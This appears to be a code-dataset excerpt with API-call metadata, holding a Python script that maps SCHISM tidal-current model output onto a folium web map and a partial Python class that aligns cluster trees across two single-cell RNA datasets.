
'spsp.csr_matrix', (['implicit_directed_mention_graph'], {}), '(implicit_directed_mention_graph)\n', (13964, 13997), True, 'import scipy.sparse as spsp\n'), ((14500, 14548), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['implicit_directed_retweet_graph'], {}), '(implicit_directed_retweet_graph)\n', (14515, 14548), True, 'import scipy.sparse as spsp\n'), ((19604, 19737), 'functools.partial', 'partial', (['worker_function'], {'lemmatizing': '"""wordnet"""', 'source_folder': 'twitter_lists_folder', 'target_folder': 'twitter_lists_keywords_folder'}), "(worker_function, lemmatizing='wordnet', source_folder=\n twitter_lists_folder, target_folder=twitter_lists_keywords_folder)\n", (19611, 19737), False, 'from functools import partial\n'), ((21806, 21855), 'reveal_user_annotation.text.clean_text.clean_single_word', 'clean_single_word', (['keyword'], {'lemmatizing': '"""wordnet"""'}), "(keyword, lemmatizing='wordnet')\n", (21823, 21855), False, 'from reveal_user_annotation.text.clean_text import clean_single_word\n'), ((25102, 25126), 'reveal_user_annotation.common.datarw.load_pickle', 'load_pickle', (['source_path'], {}), '(source_path)\n', (25113, 25126), False, 'from reveal_user_annotation.common.datarw import store_pickle, load_pickle\n'), ((25324, 25389), 'reveal_user_annotation.twitter.clean_twitter_list.user_twitter_list_bag_of_words', 'user_twitter_list_bag_of_words', (['twitter_lists_corpus', 'lemmatizing'], {}), '(twitter_lists_corpus, lemmatizing)\n', (25354, 25389), False, 'from reveal_user_annotation.twitter.clean_twitter_list import user_twitter_list_bag_of_words\n'), ((2567, 2603), 'numpy.array', 'np.array', (['[gr[newrows], gc[newcols]]'], {}), '([gr[newrows], gc[newcols]])\n', (2575, 2603), True, 'import numpy as np\n'), ((6168, 6214), 'scipy.sparse.csr_matrix', 'spsp.csr_matrix', (['(mention_graph + retweet_graph)'], {}), '(mention_graph + retweet_graph)\n', (6183, 6214), True, 'import scipy.sparse as spsp\n'), ((19567, 19587), 
'reveal_user_annotation.common.config_package.get_threads_number', 'get_threads_number', ([], {}), '()\n', (19585, 19587), False, 'from reveal_user_annotation.common.config_package import get_threads_number\n'), ((25669, 25699), 'json.dump', 'json.dump', (['user_annotation', 'fp'], {}), '(user_annotation, fp)\n', (25678, 25699), False, 'import json\n'), ((1533, 1545), 'networkx.DiGraph', 'nx.DiGraph', ([], {}), '()\n', (1543, 1545), True, 'import networkx as nx\n'), ((1622, 1632), 'networkx.Graph', 'nx.Graph', ([], {}), '()\n', (1630, 1632), True, 'import networkx as nx\n'), ((19493, 19513), 'reveal_user_annotation.common.config_package.get_threads_number', 'get_threads_number', ([], {}), '()\n', (19511, 19513), False, 'from reveal_user_annotation.common.config_package import get_threads_number\n'), ((26038, 26050), 'json.load', 'json.load', (['f'], {}), '(f)\n', (26047, 26050), False, 'import json\n')] |
import netCDF4
from tvtk.api import tvtk
from mayavi import mlab
import numpy
from scipy.interpolate import griddata,RegularGridInterpolator
from numpy import mgrid, empty, sin, pi, array, meshgrid, arange, prod
import rasterio
import os
import matplotlib.pyplot as plt
from matplotlib import cm
from pyproj import Proj, transform
import fiona
from matplotlib.path import Path
from folium.plugins import TimestampedGeoJson
import mplleaflet
import folium
import branca
import dateutil
from datetime import timedelta
from matplotlib.dates import num2date,date2num
# Coordinate systems: NZTM2000 (EPSG:2193, the model grid) -> WGS84 (EPSG:4326, web map).
# NOTE(review): 'init=' strings are deprecated in pyproj>=2 but kept here because they
# also imply the lon/lat axis order this script relies on in transform().
inProj = Proj(init='epsg:'+str(2193))
outProj = Proj(init='epsg:'+str(4326))
# some path to your local netcdf file
#path = '/home/remy/Calypso/Projects/006_Southport/hydro/child/hg6_dt30_newD/outputs/schout_14.nc'
# Reference time: hourly frames are extracted for T0-6h .. T0+6h further below.
T0=dateutil.parser.parse('2019-09-02T12:00:00Z')
fileout='Fov.html'
path = '/home/remy/Calypso/Projects/006_Southport/hydro/mother/schism/run5/outputs/schout_14.nc'
#T0=dateutil.parser.parse('2020-01-03T09:00:00Z')#T0=datenum(2020,01,03,09,00,00)+0/24;ext=3;
#fileout='Neap_tide.html'
# Bounding box [xmin, xmax, ymin, ymax] in NZTM metres (reprojected to lon/lat below).
# Superseded alternative extents kept as comments instead of dead assignments:
#lim=[1241352-400,1245886+2500,4825135,4830428]
lim=[1110740,1304120,4704419,4874442]
#lim=[1236590,1254365,4821428,4836312]
# Quiver grid resolution (points per axis) and arrow scale for the velocity field.
#quiver_res=300
quiver_res=50
quiver_scale=80
# try and import the dataset, prefer netcdf4, you might want to use pydap also here if you access a dap server.
ds = netCDF4.Dataset(path)
X=ds.variables['SCHISM_hgrid_node_x'][:]
Y=ds.variables['SCHISM_hgrid_node_y'][:]
X,Y=transform(inProj,outProj,X,Y)
lim[0],lim[2]=transform(inProj,outProj,lim[0],lim[2])
lim[1],lim[3]=transform(inProj,outProj,lim[1],lim[3])
off=0
gd = (X>=lim[0]-off) & (X<=lim[1]+off) & (Y>=lim[2]-off) & (Y<=lim[3]+off)
X=X[gd]
Y=Y[gd]
XY=numpy.array((X,Y)).T
d= ds.variables['depth'][:]
d=d[gd]
dtime = netCDF4.num2date(ds.variables['time'][:],ds.variables['time'].units)
dtime=[date2num(x._to_real_datetime()) for x in dtime]
idxTs=[]
for dt in numpy.arange(-6,6.5,1):
to=date2num(T0+timedelta(hours=dt))
idxTs.append(dtime.index(min(dtime, key=lambda x:abs(x-to))))
#D=D[gd]
Xreg, Yreg = numpy.meshgrid(numpy.linspace(lim[0],lim[1], quiver_res), numpy.linspace(lim[2], lim[3], quiver_res))
mapa = folium.Map(location=[Yreg.mean(), Xreg.mean()], tiles="Cartodb Positron",
zoom_start=10)
# shape = fiona.open('/home/remy/Calypso/Projects/006_Southport/hydro/child/animation/poly.shp')
verts=[]
# for poly in shape:
# if poly['geometry']!=None :
# nvert=len(poly['geometry']['coordinates'][0])
# verts.append([(poly['geometry']['coordinates'][0][x][0],poly['geometry']['coordinates'][0][x][1]) for x in range(0,nvert)])
is_first=True
for i,idxT in enumerate(idxTs):
print(i)
if (i!=2) and (i!=9):
continue
# read the variables (these are just links to the objects for now)
u = ds.variables['hvel'][idxT,:,-1,0] # velocity in u direction
v = ds.variables['hvel'][idxT,:,-1,1] # v direction
e = ds.variables['elev'][idxT,:] # v direction
e=e[gd]
u=u[gd]
v=v[gd]
bad=e+d<0.1
U = griddata(XY[~bad,:], u[~bad],(Xreg,Yreg),method='linear')
V = griddata(XY[~bad,:], v[~bad],(Xreg,Yreg),method='linear')
E = griddata(XY[~bad,:], e[~bad],(Xreg,Yreg),method='linear')
D = griddata(XY[~bad,:], d[~bad],(Xreg,Yreg),method='linear')
fig = plt.figure(figsize=(30,18))
ax = fig.add_subplot(111)
ax.set_aspect('equal')
mag=numpy.sqrt(U**2+V**2)*1.94
U[numpy.isnan(U)]=0
V[numpy.isnan(V)]=0
mag[numpy.isnan(mag)]=0
#Xreg[numpy.isnan(Xreg)]=0
#Yreg[numpy.isnan(Yreg)]=0
Q = ax.quiver(Xreg, Yreg, U*1.94, V*1.94,mag,scale=quiver_scale,color=cm.viridis(64),clim=[0,4])
gj = mplleaflet.fig_to_geojson(fig=fig)
if i==2:
name='Ebb tide'
elif i==9:
name='Flood tide'
feature_group0 = folium.FeatureGroup(name=name,show=is_first)
#'%.1fH' % ((dtime[idxTs[i]]-date2num(T0))*24)
is_first=False
spd=RegularGridInterpolator([Yreg[:,0],Xreg[0,:]],mag)
for feature in gj['features']:
if feature['geometry']['type'] == 'Point':
lon, lat = feature['geometry']['coordinates']
div = feature['properties']['html']
flag=False
for vert in verts:
p=Path(vert)
flag = p.contains_points([[lon,lat]])
if flag:
break
Spd=spd([lat,lon])[0]
if not flag and Spd>0.05:
#print(Spd)
icon_anchor = (feature['properties']['anchor_x'],
feature['properties']['anchor_y'])
icon = folium.features.DivIcon(html=div,
icon_anchor=icon_anchor)
#spd=
marker = folium.Marker([lat, lon], icon=icon)
marker.add_child(folium.Popup('%.1f' % Spd))
feature_group0.add_child(marker)
else:
msg = "Unexpected geometry {}".format
raise ValueError(msg(feature['geometry']))
mapa.add_child(feature_group0)
tile = folium.TileLayer(
tiles = 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}',
attr = 'Esri',
name = 'Esri Satellite',
overlay = False,
control = False
).add_to(mapa)
colormap = branca.colormap.linear.viridis.scale(0, 4)
colormap = colormap.to_step(index=numpy.arange(0,4.01,.01))
colormap.caption = 'Tidal speed [knt]'
colormap.add_to(mapa)
folium.LayerControl(collapsed=False).add_to(mapa)
mapa.save(fileout)
| [
"numpy.isnan",
"folium.TileLayer",
"matplotlib.pyplot.figure",
"numpy.arange",
"netCDF4.Dataset",
"datetime.timedelta",
"numpy.linspace",
"mplleaflet.fig_to_geojson",
"folium.features.DivIcon",
"dateutil.parser.parse",
"scipy.interpolate.griddata",
"folium.Popup",
"branca.colormap.linear.vir... | [((783, 828), 'dateutil.parser.parse', 'dateutil.parser.parse', (['"""2019-09-02T12:00:00Z"""'], {}), "('2019-09-02T12:00:00Z')\n", (804, 828), False, 'import dateutil\n'), ((1354, 1375), 'netCDF4.Dataset', 'netCDF4.Dataset', (['path'], {}), '(path)\n', (1369, 1375), False, 'import netCDF4\n'), ((1463, 1495), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'X', 'Y'], {}), '(inProj, outProj, X, Y)\n', (1472, 1495), False, 'from pyproj import Proj, transform\n'), ((1507, 1549), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'lim[0]', 'lim[2]'], {}), '(inProj, outProj, lim[0], lim[2])\n', (1516, 1549), False, 'from pyproj import Proj, transform\n'), ((1561, 1603), 'pyproj.transform', 'transform', (['inProj', 'outProj', 'lim[1]', 'lim[3]'], {}), '(inProj, outProj, lim[1], lim[3])\n', (1570, 1603), False, 'from pyproj import Proj, transform\n'), ((1770, 1839), 'netCDF4.num2date', 'netCDF4.num2date', (["ds.variables['time'][:]", "ds.variables['time'].units"], {}), "(ds.variables['time'][:], ds.variables['time'].units)\n", (1786, 1839), False, 'import netCDF4\n'), ((1917, 1941), 'numpy.arange', 'numpy.arange', (['(-6)', '(6.5)', '(1)'], {}), '(-6, 6.5, 1)\n', (1929, 1941), False, 'import numpy\n'), ((5474, 5516), 'branca.colormap.linear.viridis.scale', 'branca.colormap.linear.viridis.scale', (['(0)', '(4)'], {}), '(0, 4)\n', (5510, 5516), False, 'import branca\n'), ((1704, 1723), 'numpy.array', 'numpy.array', (['(X, Y)'], {}), '((X, Y))\n', (1715, 1723), False, 'import numpy\n'), ((2092, 2134), 'numpy.linspace', 'numpy.linspace', (['lim[0]', 'lim[1]', 'quiver_res'], {}), '(lim[0], lim[1], quiver_res)\n', (2106, 2134), False, 'import numpy\n'), ((2135, 2177), 'numpy.linspace', 'numpy.linspace', (['lim[2]', 'lim[3]', 'quiver_res'], {}), '(lim[2], lim[3], quiver_res)\n', (2149, 2177), False, 'import numpy\n'), ((3074, 3135), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'u[~bad]', '(Xreg, Yreg)'], {'method': 
'"""linear"""'}), "(XY[~bad, :], u[~bad], (Xreg, Yreg), method='linear')\n", (3082, 3135), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3140, 3201), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'v[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], v[~bad], (Xreg, Yreg), method='linear')\n", (3148, 3201), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3206, 3267), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'e[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], e[~bad], (Xreg, Yreg), method='linear')\n", (3214, 3267), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3272, 3333), 'scipy.interpolate.griddata', 'griddata', (['XY[~bad, :]', 'd[~bad]', '(Xreg, Yreg)'], {'method': '"""linear"""'}), "(XY[~bad, :], d[~bad], (Xreg, Yreg), method='linear')\n", (3280, 3333), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3341, 3369), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(30, 18)'}), '(figsize=(30, 18))\n', (3351, 3369), True, 'import matplotlib.pyplot as plt\n'), ((3719, 3753), 'mplleaflet.fig_to_geojson', 'mplleaflet.fig_to_geojson', ([], {'fig': 'fig'}), '(fig=fig)\n', (3744, 3753), False, 'import mplleaflet\n'), ((3854, 3899), 'folium.FeatureGroup', 'folium.FeatureGroup', ([], {'name': 'name', 'show': 'is_first'}), '(name=name, show=is_first)\n', (3873, 3899), False, 'import folium\n'), ((3978, 4032), 'scipy.interpolate.RegularGridInterpolator', 'RegularGridInterpolator', (['[Yreg[:, 0], Xreg[0, :]]', 'mag'], {}), '([Yreg[:, 0], Xreg[0, :]], mag)\n', (4001, 4032), False, 'from scipy.interpolate import griddata, RegularGridInterpolator\n'), ((3435, 3462), 'numpy.sqrt', 'numpy.sqrt', (['(U ** 2 + V ** 2)'], {}), '(U ** 2 + V ** 2)\n', (3445, 3462), False, 'import numpy\n'), ((3469, 3483), 'numpy.isnan', 'numpy.isnan', (['U'], {}), '(U)\n', (3480, 3483), False, 
'import numpy\n'), ((3493, 3507), 'numpy.isnan', 'numpy.isnan', (['V'], {}), '(V)\n', (3504, 3507), False, 'import numpy\n'), ((3519, 3535), 'numpy.isnan', 'numpy.isnan', (['mag'], {}), '(mag)\n', (3530, 3535), False, 'import numpy\n'), ((5203, 5398), 'folium.TileLayer', 'folium.TileLayer', ([], {'tiles': '"""https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}"""', 'attr': '"""Esri"""', 'name': '"""Esri Satellite"""', 'overlay': '(False)', 'control': '(False)'}), "(tiles=\n 'https://server.arcgisonline.com/ArcGIS/rest/services/World_Imagery/MapServer/tile/{z}/{y}/{x}'\n , attr='Esri', name='Esri Satellite', overlay=False, control=False)\n", (5219, 5398), False, 'import folium\n'), ((5551, 5578), 'numpy.arange', 'numpy.arange', (['(0)', '(4.01)', '(0.01)'], {}), '(0, 4.01, 0.01)\n', (5563, 5578), False, 'import numpy\n'), ((5640, 5676), 'folium.LayerControl', 'folium.LayerControl', ([], {'collapsed': '(False)'}), '(collapsed=False)\n', (5659, 5676), False, 'import folium\n'), ((1960, 1979), 'datetime.timedelta', 'timedelta', ([], {'hours': 'dt'}), '(hours=dt)\n', (1969, 1979), False, 'from datetime import timedelta\n'), ((3681, 3695), 'matplotlib.cm.viridis', 'cm.viridis', (['(64)'], {}), '(64)\n', (3691, 3695), False, 'from matplotlib import cm\n'), ((4295, 4305), 'matplotlib.path.Path', 'Path', (['vert'], {}), '(vert)\n', (4299, 4305), False, 'from matplotlib.path import Path\n'), ((4667, 4725), 'folium.features.DivIcon', 'folium.features.DivIcon', ([], {'html': 'div', 'icon_anchor': 'icon_anchor'}), '(html=div, icon_anchor=icon_anchor)\n', (4690, 4725), False, 'import folium\n'), ((4854, 4890), 'folium.Marker', 'folium.Marker', (['[lat, lon]'], {'icon': 'icon'}), '([lat, lon], icon=icon)\n', (4867, 4890), False, 'import folium\n'), ((4941, 4967), 'folium.Popup', 'folium.Popup', (["('%.1f' % Spd)"], {}), "('%.1f' % Spd)\n", (4953, 4967), False, 'import folium\n')] |
import itertools
from collections import deque
import networkx as nx
import numpy as np
import pandas as pd
import scanpy as sc
from .._util import CapitalData
class Tree_Alignment:
def __init__(self):
self.__successors1 = None
self.__postorder1 = None
self.__tree1 = None
self.__successors2 = None
self.__postorder2 = None
self.__tree2 = None
self.__forestdistance = None
self.__traceforest = None
self.__treedistance = None
self.__tracetree = None
self.__alignmentcost = None
def tree_alignment(
self,
adata1,
adata2,
cost=1.0,
N_1=2000,
N_2=2000
):
COST = cost
gene_list = self.sort_data(
adata1, adata2, N_1, N_2)
adata1.uns["capital"]["intersection_genes"] = np.array(
gene_list, dtype=object)
adata2.uns["capital"]["intersection_genes"] = np.array(
gene_list, dtype=object)
self._dp(adata1, adata2, gene_list, COST)
alignedtree = self._traceback()
path_cluster_list = []
source_node = list(nx.topological_sort(alignedtree))[0]
for node in list(alignedtree.nodes):
if alignedtree.out_degree(node) == 0:
cluster_list = nx.shortest_path(
alignedtree, source=source_node, target=node)
route1 = [i[0] for i in cluster_list]
route2 = [i[1] for i in cluster_list]
path_cluster_list.append([route1, route2])
alignmentdict = {"alignment{:03d}".format(i):
{"data1": clusters[0],
"data2": clusters[1]}
for i, clusters in enumerate(path_cluster_list)}
aligned_data = CapitalData(
adata1.copy(),
adata2.copy(),
alignedtree,
np.array([self.__alignmentcost], dtype=int),
np.array(gene_list, dtype=object),
alignmentdict,
)
return aligned_data
def _set_initial_condition(
self,
data1,
data2,
cost=1.0
):
self.__successors1 = data1.uns["capital"]["tree"]["successors"]
self.__postorder1 = data1.uns["capital"]["tree"]["postorder"]
self.__tree1 = nx.convert_matrix.from_pandas_adjacency(
data1.uns["capital"]["tree"]["tree"], create_using=nx.DiGraph)
self.__successors2 = data2.uns["capital"]["tree"]["successors"]
self.__postorder2 = data2.uns["capital"]["tree"]["postorder"]
self.__tree2 = nx.convert_matrix.from_pandas_adjacency(
data2.uns["capital"]["tree"]["tree"],create_using=nx.DiGraph)
# get combination of children
# D(F1[i],F2[j]) is stored in forestdistance.loc[i,j]
# D(F1[i1,i2],F2[j]) is stored in forestdistance.loc["(i1,i2)",j]
# D({T1[i]},F2[j]) is stored in forestdistance.loc["(i,)", j]
forest1_combinations = []
for child in self.__successors1.values():
if child.size == 1:
children = list(itertools.combinations(child, 1))
forest1_combinations.extend(children)
elif child.size >= 1:
for k in range(1, child.size):
children = list(itertools.combinations(child, k))
forest1_combinations.extend(children)
forest2_combinations = []
for child in self.__successors2.values():
if child.size == 1:
children = list(itertools.combinations(child, 1))
forest2_combinations.extend(children)
elif child.size >= 1:
for k in range(1, child.size):
children = list(itertools.combinations(child, k))
forest2_combinations.extend(children)
forest1 = [i for i in list(self.__tree1.nodes)] + \
forest1_combinations + ["#"]
forest2 = [j for j in list(self.__tree2.nodes)] + \
forest2_combinations + ["#"]
forest1 = list(map(str, forest1))
forest2 = list(map(str, forest2))
forest = pd.DataFrame(index=forest1, columns=forest2)
forest.loc["#", "#"] = 0
tree = pd.DataFrame(
index=list(map(str, list(self.__tree1))) + ["#"],
columns=list(map(str, list(self.__tree2))) + ["#"])
tree.loc["#", "#"] = 0
self.__forestdistance = forest
self.__traceforest = pd.DataFrame(index=forest1, columns=forest2)
self.__treedistance = tree
self.__tracetree = pd.DataFrame(
index=list(map(str, list(self.__tree1))) + ["#"],
columns=list(map(str, list(self.__tree2))) + ["#"])
COST = cost
for i in self.__postorder1:
size, successors = self._get_successors(self.__successors1, i)
if size == 1:
# D(F1[i],θ) = Σ D(T1[ik],θ)
self._setF(i, "#", self._getT(successors[0], "#"))
self._setT(i, "#", self._getF(i, "#") + COST)
else:
# D(F1[i],θ) = Σ D(T1[ik],θ)
tmp = 0
for ichild in successors:
tmp += self._getT(ichild, "#")
self._setF(i, "#", tmp)
# D({T1[ip],...,T1[iq]},θ) = D(T1[ip],θ) + ... + D(T1[iq],θ)
for k in range(1, size):
children = list(itertools.combinations(successors, k))
for ichild in children:
tmp = 0
for k in ichild:
tmp += self._getT(k, "#")
self._setF(ichild, "#", tmp)
self._setT(i, "#", self._getF(i, "#") + COST)
for j in self.__postorder2:
size, successors = self._get_successors(self.__successors2, j)
if size == 1:
self._setF("#", j, self._getT("#", successors[0]))
self._setT("#", j, self._getF("#", j) + COST)
else:
tmp = 0
for jchild in successors:
tmp += self._getT("#", jchild)
self._setF("#", j, tmp)
for k in range(1, size):
children = list(itertools.combinations(successors, k))
for jchild in children:
tmp = 0
for k in jchild:
tmp += self._getT("#", k)
self._setF("#", jchild, tmp)
self._setT("#", j, self._getF("#", j) + COST)
@property
def forestdistance(self):
return self.__forestdistance
@property
def traceforest(self):
return self.__traceforest
@property
def tracetree(self):
return self.__tracetree
@property
def treedistance(self):
return self.__treedistance
def sort_data(
self,
adata1,
adata2,
N_1=None,
N_2=None
):
if N_1 is not None:
adata1 = adata1.raw.to_adata()
sc.pp.highly_variable_genes(adata1, n_top_genes=N_1)
adata1 = adata1[:, adata1.var['highly_variable']]
elif N_1 is None:
pass
if N_2 is not None:
adata2 = adata2.raw.to_adata()
sc.pp.highly_variable_genes(adata2, n_top_genes=N_2)
adata2 = adata2[:, adata2.var['highly_variable']]
elif N_2 is None:
pass
s1 = set(adata1.var.index)
s2 = set(adata2.var.index)
intersection_list = list(s1.intersection(s2))
if len(intersection_list) < 2:
raise ValueError("highly variable genes of intersection of data1 and data2 are not enough "\
"to calculate the cost of a tree alignment. \n"\
"Specify num_genes1 and num_genes2 carefully.")
print("{} genes are used to calculate cost of tree alignment.\n".format(
len(intersection_list)))
return intersection_list
# cluster_centroid: pd.DataFrame
# index is cluster name, columns is gene name, X is gene expression level
def _calculate_cluster_centroid_for_genes(
self,
adata,
gene_list,
):
groupby = adata.uns["capital"]["tree"]["annotation"]
filtered_data = adata.raw.to_adata()[:, gene_list]
cluster_centroid_data = np.empty((0, filtered_data.n_vars))
clustername = filtered_data.obs[groupby].unique().tolist()
for i in clustername:
a_cluster_data = filtered_data[filtered_data.obs[groupby] == "{}".format(
i)].to_df()
a_cluster_median = a_cluster_data.median(axis=0).values
cluster_centroid_data = np.vstack(
(cluster_centroid_data, a_cluster_median)
)
cluster_centroid = pd.DataFrame(
cluster_centroid_data,
index=clustername,
columns=filtered_data.var_names
)
return cluster_centroid
# return length of i's children and tuple of children
def _get_successors(self, successors, i):
size = successors[i].size
successor = tuple([str(k) for k in successors[i]])
if len(successor) == 0:
successor = ("#")
return size, successor
def _setF(self, i, j, distance):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__forestdistance.index:
print("Error: {} does not exist in forestdistance index.".format(i))
if j not in self.__forestdistance.columns:
print("Error: {} does not exist in forestdistance columns.".format(j))
self.__forestdistance.loc[i, j] = distance
def _settraceF(self, i, j, trace):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__traceforest.index:
print("Error: {} does not exist in traceforest index.".format(i))
if j not in self.__traceforest.columns:
print("Error: {} does not exist in traceforest columns.".format(j))
self.__traceforest.loc[i, j] = trace
def _settraceT(self, i, j, trace):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__tracetree.index:
print("Error: {} does not exist in tracetree index.".format(i))
if j not in self.__tracetree.columns:
print("Error: {} does not exist in tracetree columns.".format(j))
self.__tracetree.loc[i, j] = trace
def _setT(self, i, j, distance):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__treedistance.index:
print("Error: {} does not exist in treedistance index.".format(i))
if j not in self.__treedistance.columns:
print("Error: {} does not exist in treedistance columns.".format(j))
self.__treedistance.loc[i, j] = distance
def _getF(self, i, j, parent1="Nan", parent2="Nan"):
if isinstance(i, tuple):
if len(i) == 0:
i = "#"
i = str(i)
if isinstance(j, tuple):
if len(j) == 0:
j = "#"
j = str(j)
if i not in self.__forestdistance.index:
i = str(parent1)
if j not in self.__forestdistance.columns:
j = str(parent2)
F = self.__forestdistance.loc[i, j]
return F
def _getT(self, i, j):
i = str(i)
j = str(j)
if i not in self.__treedistance.index:
print("Error: TreeDistance index called does not exist.")
if j not in self.__treedistance.columns:
print("Error: TreeDistance columns called does not exist.")
T = self.__treedistance.loc[i, j]
return T
def _cal1(self, A, B):
if not isinstance(A, tuple):
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
_, B = self._get_successors(self.__successors2, B)
mintemp = 1000
trace = "Nan"
temp = 0
for k in A:
for l in B:
Asub = tuple([i for i in A if i != k])
Bsub = tuple([j for j in B if j != l])
temp = self._getF(Asub, Bsub) + self._getT(k, l)
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if l == ():
l = "#"
if Asub == ():
Asub = "#"
if k == ():
k = "#"
trace = [1, [Asub, Bsub], [k, l]]
return mintemp, trace
def _cal2(self, A, B, cost):
COST = cost
parentA = "Nan"
parentB = "Nan"
if not isinstance(A, tuple):
parentA = A
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
parentB = B
_, B = self._get_successors(self.__successors2, B)
Bprime = [()]
for m in range(1, len(B)+1):
for Bp in list(itertools.combinations(B, m)):
Bprime.extend([Bp])
mintemp = 1000
trace = "Nan"
temp = 0
for k in A:
for Bp in Bprime:
Asub = tuple([i for i in A if i != k])
Bsub = tuple([j for j in B if not j in Bp])
if k == "#":
temp = self._getF(Asub, Bsub, parent2=parentB) + \
self._getF("#", Bp, parent2=parentB)
else:
temp = self._getF(Asub, Bsub, parent2=parentB) + \
self._getF(k, Bp, parent2=parentB) + COST
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if Bp == ():
Bp = "#"
if Asub == ():
Asub = "#"
if k == ():
k = "#"
if not "{}".format(Bsub) in self.__forestdistance.columns:
Bsub = parentB
if not "{}".format(Bp) in self.__forestdistance.columns:
Bp = parentB
trace = [2, [[Asub, Bsub], [k, Bp]], (k, "#")]
return mintemp, trace
# min D(A-Aprime,B-{T2[jq]}) + D(Aprime,F2[jq]) + cost
def _cal3(self, A, B, cost):
COST = cost
parentA = "Nan"
parentB = "Nan"
if not isinstance(A, tuple):
parentA = A
_, A = self._get_successors(self.__successors1, A)
if not isinstance(B, tuple):
parentB = B
_, B = self._get_successors(self.__successors2, B)
Aprime = [()]
for m in range(1, len(A)+1):
for Ap in list(itertools.combinations(A, m)):
Aprime.extend([Ap])
mintemp = 1000
trace = "Nan"
temp = 0
for l in B:
for Ap in Aprime:
Asub = tuple([i for i in A if i not in Ap])
Bsub = tuple([j for j in B if j != l])
temp = self._getF(Asub, Bsub, parent1=parentA) + \
self._getF(Ap, l, parent1=parentA) + COST
if mintemp > temp:
mintemp = temp
if Bsub == ():
Bsub = "#"
if l == ():
l = "#"
if Asub == ():
Asub = "#"
if Ap == ():
Ap = "#"
if not "{}".format(Asub) in self.__forestdistance.index:
Asub = parentA
if not "{}".format(Ap) in self.__forestdistance.index:
Ap = parentA
trace = [3, [[Asub, Bsub], [Ap, l]], ("#", l)]
return mintemp, trace
# trace is a list that has 3 pairs like [a,(b),(c)]
# a is a record that show which calculation was done
# (b) is a pair or 2 pairs that goes to the search in traceforest for the next traceback
# (c) is a pair that goes to stack or foreststack
def _calculateForest(
self,
A,
B,
cost
):
COST = cost
min1, trace1 = self._cal1(A, B)
min2, trace2 = self._cal2(A, B, COST)
min3, trace3 = self._cal3(A, B, COST)
forestdistance = np.array([min1, min2, min3], dtype=object).min()
trace = [trace1, trace2, trace3][np.array([min1, min2, min3], dtype=object).argmin()]
return forestdistance, trace
# trace is a list that has 3 pairs like [(a),(b),(c)]
# (a) is a record that show which calculation was done
# (b) is a pair of the match result for D(T[i],T[j])
# (c) is a pair that goes to the stack
def _calculateTreedistance(
self,
i,
j,
mincost
):
MINCOST = mincost
_, successor1 = self._get_successors(self.__successors1, i)
_, successor2 = self._get_successors(self.__successors2, j)
distancelist = []
for l in successor2:
distancelist.append(
[self._getT("#", j) + self._getT(i, l) - self._getT("#", l), [0, ("#", j), (i, l)]])
for k in successor1:
distancelist.append(
[self._getT(i, "#") + self._getT(k, j) - self._getT(k, "#"), [0, (i, "#"), (k, j)]])
distancelist.append([self._getF(i, j) + MINCOST, [1, (i, j), (i, j)]])
array = np.array(distancelist, dtype=object)
treedistance = array[:, 0].min()
trace = array[array[:, 0].argmin(), 1]
return treedistance, trace
def _dp(
self,
adata1,
adata2,
gene_list,
cost
):
# np.warning cause warning below
# VisibleDeprecationWarning: Creating an ndarray from ragged nested sequences is deprecated.
# If you meant to do this, you must specify 'dtype=object' when creating the ndarray.
# however it causes inside pandas and to recover this wanrnig, we need to rewrite all the code above
# and it still get the result we need. we will get this right soon.
np.warnings.filterwarnings(
'ignore', category=np.VisibleDeprecationWarning)
COST = cost
self._set_initial_condition(adata1, adata2, cost=COST)
cluster_centroid1 = self._calculate_cluster_centroid_for_genes(
adata1, gene_list)
cluster_centroid2 = self._calculate_cluster_centroid_for_genes(
adata2, gene_list)
for i in self.__postorder1:
for j in self.__postorder2:
df = pd.DataFrame(
{"A": cluster_centroid1.loc[i], "B": cluster_centroid2.loc[j]})
mincost = 1 - df.corr(method="spearman").iloc[0, 1]
size1, successor1 = self._get_successors(self.__successors1, i)
size2, successor2 = self._get_successors(self.__successors2, j)
Alist = []
if size1 == 0:
pass
elif size1 == 1:
Alist.extend([(successor1)])
else:
for m in range(1, len(successor1)):
for l in list(itertools.combinations(successor1, m)):
Alist.extend([l])
Alist.extend([i])
if size2 == 0:
pass
elif size2 == 1:
for A in Alist:
fdistance, ftrace = self._calculateForest(
A, (successor2), COST)
self._setF(A, (successor2), fdistance)
self._settraceF(A, (successor2), ftrace)
else:
for m in range(1, len(successor2)):
for B in list(itertools.combinations(successor2, m)):
for A in Alist:
fdistance, ftrace = self._calculateForest(
A, B, COST)
self._setF(A, B, fdistance)
self._settraceF(A, B, ftrace)
for A in Alist:
fdistance, ftrace = self._calculateForest(A, j, COST)
self._setF(A, j, fdistance)
self._settraceF(A, j, ftrace)
tdistance, ttrace = self._calculateTreedistance(i, j, mincost)
